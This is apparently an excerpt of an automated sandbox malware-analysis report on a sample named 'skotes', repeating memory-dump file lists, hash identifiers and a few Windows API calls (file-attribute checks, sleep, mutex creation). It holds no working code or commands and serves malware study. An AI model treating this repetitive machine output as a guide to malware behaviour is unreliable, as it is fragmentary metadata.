                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469922798.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3473492363.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3474734079.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3475645098.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476651388.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476938674.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477070298.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477264101.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477393595.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477657476.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477851250.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478022799.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478177580.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478382081.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478540619.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478784297.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478916346.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479082698.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479224017.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480189121.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480364133.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480502735.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480582275.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480721803.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480920537.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481180448.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481324628.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481427628.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_6_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AttributesCreateFileMutexSleep
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 396266464-0
                                                                                                                                                                                                                                              • Opcode ID: 12c0eda293c2bea1d20ca8f7a590a9832bc58edacb1e1e8576a240aa8592c92f
                                                                                                                                                                                                                                              • Instruction ID: 284f9d18b34fc1480afdf2f6a6ee16c9c1b5728cb218861e37c3b09529ee2917
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 12c0eda293c2bea1d20ca8f7a590a9832bc58edacb1e1e8576a240aa8592c92f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9D3128327001449BEB08DB78DDC976DF7F2EBC6310F24429AE014A73D5E77A99848762
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(00000000), ref: 00BDA2E6
                                                                                                                                                                                                                                              • Sleep.KERNEL32(00000064,?), ref: 00BDA963
                                                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00C33254), ref: 00BDA981
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000006.00000002.3457897829.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457753663.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457897829.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458429750.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458649300.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458785892.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459052762.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459270282.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3460431228.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3461770601.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3463645711.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464669746.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3466594651.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467635601.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467790959.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469684463.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469922798.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3473492363.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3474734079.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3475645098.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476651388.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476938674.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477070298.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477264101.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477393595.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477657476.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477851250.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478022799.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478177580.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478382081.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478540619.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478784297.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478916346.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479082698.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479224017.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480189121.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480364133.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480502735.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480582275.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480721803.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480920537.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481180448.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481324628.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481427628.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_6_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AttributesCreateFileMutexSleep
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 396266464-0
                                                                                                                                                                                                                                              • Opcode ID: bb6e5609d8d163e1cd1163f95519ba8d0794a4fb41c94f20b1a3c5ee5c6301c2
                                                                                                                                                                                                                                              • Instruction ID: 7c3dd0bf0ed390d8a50a18fd94969b41c700952ad3b106beb926185710410179
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bb6e5609d8d163e1cd1163f95519ba8d0794a4fb41c94f20b1a3c5ee5c6301c2
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2D317B317001449BEB08DB78DC8876DF7F2EBC6320F20869AE014D77E5E77A99808726
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(00000000), ref: 00BDA41B
                                                                                                                                                                                                                                              • Sleep.KERNEL32(00000064,?), ref: 00BDA963
                                                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00C33254), ref: 00BDA981
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000006.00000002.3457897829.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457753663.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457897829.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458429750.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458649300.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458785892.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459052762.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459270282.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3460431228.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3461770601.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3463645711.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464669746.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3466594651.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467635601.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467790959.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469684463.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469922798.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3473492363.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3474734079.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3475645098.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476651388.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476938674.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477070298.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477264101.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477393595.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477657476.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477851250.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478022799.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478177580.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478382081.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478540619.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478784297.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478916346.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479082698.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479224017.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480189121.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480364133.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480502735.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480582275.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480721803.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480920537.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481180448.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481324628.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481427628.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_6_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AttributesCreateFileMutexSleep
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 396266464-0
                                                                                                                                                                                                                                              • Opcode ID: a3c8d6f2d6fdbd46ec26e1ef1127f6934e583a9f69e900a9500c23ffabb6d6a2
                                                                                                                                                                                                                                              • Instruction ID: 5d827d171af6e49c117672958a488de28d9abed9f52a96fbddac6fc62cb4c734
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a3c8d6f2d6fdbd46ec26e1ef1127f6934e583a9f69e900a9500c23ffabb6d6a2
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 383148327001449BEB08EB78D98DB6DF7F2EFC5314F20429AE014A73D5E7B999808666
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(00000000), ref: 00BDA550
                                                                                                                                                                                                                                              • Sleep.KERNEL32(00000064,?), ref: 00BDA963
                                                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00C33254), ref: 00BDA981
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000006.00000002.3457897829.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457753663.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457897829.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458429750.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458649300.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458785892.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459052762.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459270282.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3460431228.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3461770601.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3463645711.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464669746.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3466594651.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467635601.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467790959.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469684463.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469922798.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3473492363.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3474734079.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3475645098.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476651388.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476938674.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477070298.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477264101.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477393595.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477657476.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477851250.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478022799.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478177580.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478382081.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478540619.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478784297.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478916346.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479082698.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479224017.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480189121.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480364133.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480502735.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480582275.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480721803.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480920537.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481180448.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481324628.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481427628.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_6_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AttributesCreateFileMutexSleep
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 396266464-0
                                                                                                                                                                                                                                              • Opcode ID: 3903031b7866f126912f807db15be8c3ad7e7683f6b7a05c7905104f74498a94
                                                                                                                                                                                                                                              • Instruction ID: 7580b4c3c1aaec651105929a49d41af808b65f3cae25fa8e0d5393bf29cd4a02
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3903031b7866f126912f807db15be8c3ad7e7683f6b7a05c7905104f74498a94
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1C312A317001448BEB08DB78ECC976DF7E6EB85314F24429AE414D73D5E77999808726
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(00000000), ref: 00BDA685
                                                                                                                                                                                                                                              • Sleep.KERNEL32(00000064,?), ref: 00BDA963
                                                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00C33254), ref: 00BDA981
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000006.00000002.3457897829.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457753663.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457897829.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458429750.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458649300.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458785892.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
